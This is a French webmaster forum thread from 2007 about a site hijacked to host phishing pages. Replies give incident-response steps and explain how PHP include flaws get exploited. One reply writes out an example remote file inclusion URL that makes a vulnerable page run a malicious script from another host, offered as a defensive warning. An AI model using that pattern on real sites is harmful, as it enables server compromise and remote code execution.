hacking

JeromeRookie · 14 Mars 2007

Bonjour,
j'ai reçu un mail d'un organisme mandaté par une banque italienne m'indiquant que des plaintes de phishing avait été détectées sur une url hébergée sur mon site.... 8O :evil: :evil:

après vérification, il y a effectivement des fichiers déposés sur mon site par qqun d'autre que moi; après en avoir fait une copie, j'ai tout effacé et ai informé mon hébergeur en infogérence.

savez-vous ce que je risque concrètement ?

merci pour votre aide...

finstreet · 14 Mars 2007

en théorie tu risques rien ... par contre faut vraiment trouver comment tu t'es fait hacker

houcine-b · 14 Mars 2007

les risque juridique aucune idée, mais moi je suis passé par la meme experience que toi, mon hebergeur ma supprimé le site malgré que je suis innocent

lolo2e · 14 Mars 2007

Si j'ai bien compris une personne a réussi à transférer des fichiers à lui sur ton site.....

Tu as fait attention à tes mots de passe !!!!

biscuit · 15 Mars 2007

surtout aux includes...

Jeviensderio · 15 Mars 2007

surtout aux includes

Plus précisément?

Topsitemaker · 15 Mars 2007

Ca dépend si tu es en mutualisé ou en serveur dédié,
Dans le 1er cas, ton hébergeur doit rechercher les failles qui ont permis de perçer le serveur. De ton coté tu dois vérifier si ton code php ne présente aucune faille. Faut regarder si tu as des projets 'open source' non patché, notamment.

Dans le 2ème cas, il faut que tu fasses cette recherche toi -même.
Dans tous les cas, ca va te prendre du temps à tout checker. Donc dans l'ordre,
- tu passes un anti-Rootkit comme Chkrootkit ou Rkhunter.
- Check les logs /var/log/secure, pour voir le hack a eu accès direct à un compte.
- Check tous les historisations de compte comme /root/.bash_history
- Check tes clés SSH, pour voir s'ils ne sont pas corrompus
- Check les logs ftp,
- Check le répertoire /tmp d'apache
- les logs apache avec un grep sur le répertoire ou tu t'es fais hacké.

Il faut tu aies les preuves que tu t'es fait hacké, déjà pour que tu apprennes un minimum sur cette expérience.

Dans les 2 cas, tu devrais immobiliser le serveur et refondre le système si un compte a été forcé.

JeromeRookie · 15 Mars 2007

merci pour vos réponses. j'ai un serveur virtuels donc j'en suis responsable. mais ne sachant pas faire ce que tu évoques, j'ai un contrat de maintenanc een infogérence. Mon hébergeur est en train de vérifier. à Priori, il s'agirait d'une MAJ de webmin non faite. je vais changer tous les mots de passe.

biscuit · 15 Mars 2007

Jeviensderio a dit:
surtout aux includes

Cliquez pour agrandir...

Plus précisément?

si tu as des urls du type call.php?fichier=accueil et que dans ton code tu fait un include $_GET['fichier'], bien vérifier que $_GET['fichier'] soit un de tes fichier car si j'appelle call.php?fichier=http://www.example.com/mon_fichier_malveillant.php je pourrai interpréter n'importe quel script sur ton serveur... (donc = pas bon)

Jeviensderio · 15 Mars 2007

Merci. Je vais vérifier cela.

easy_zik · 15 Mars 2007

ASP = beurk

Si c'est des hackeurs anti-asp, ils sont peut etre pas si mauvais que ça

bon, je :arrow:

shelcko · 15 Mars 2007

t'as un tuto sur les failles includes ici